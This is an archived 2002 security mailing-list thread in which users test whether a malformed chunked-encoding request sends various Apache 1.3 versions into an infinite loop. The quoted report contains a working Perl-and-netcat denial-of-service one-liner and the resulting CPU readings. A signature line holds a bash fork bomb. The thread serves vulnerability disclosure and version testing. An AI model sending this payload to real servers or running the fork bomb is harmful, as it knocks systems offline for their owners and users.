DEAR Edwin Groothuis: Apache/1.3.23 (Unix) (Red-Hat/Linux) in my box doesn't show this dehaviour kiven_chen ======= 2002-06-20 12:13:00 IN YOUR E-MAIL£º======= >On Thu, Jun 20, 2002 at 12:21:47AM +0200, Przemyslaw Frasunek wrote: >> I was playing a bit with chunked encoding vulnerability and found the >> following. When I send a request to Apache 1.3.24 using malformed >> chunked encoding, httpd process goes into infinite loop and CPU load >> grows to 100. Example: >> >> perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80 >> >> 62681 www 63 0 146M 5364K RUN 3:08 45.90 45.90 apache >> 42121 www 63 0 139M 2524K RUN 1:15 44.97 44.97 apache >> >> Can anyone try it with 1.3.26? > >Apache 1.3.26 doesn't show this behaviour >(yes, I've tried it with 1.3.20 first) > >Edwin >-- >Edwin Groothuis | Personal website: http://www.MavEtJu.org >edwinat_private | Interested in MUDs? Visit Fatal Dimensions: >bash$ :(){ :|:&};: | http://www.FatalDimensions.org/ = = = = = = = = = = = = = = = = = = = =
This archive was generated by hypermail 2b30 : Thu Jun 20 2002 - 09:13:20 PDT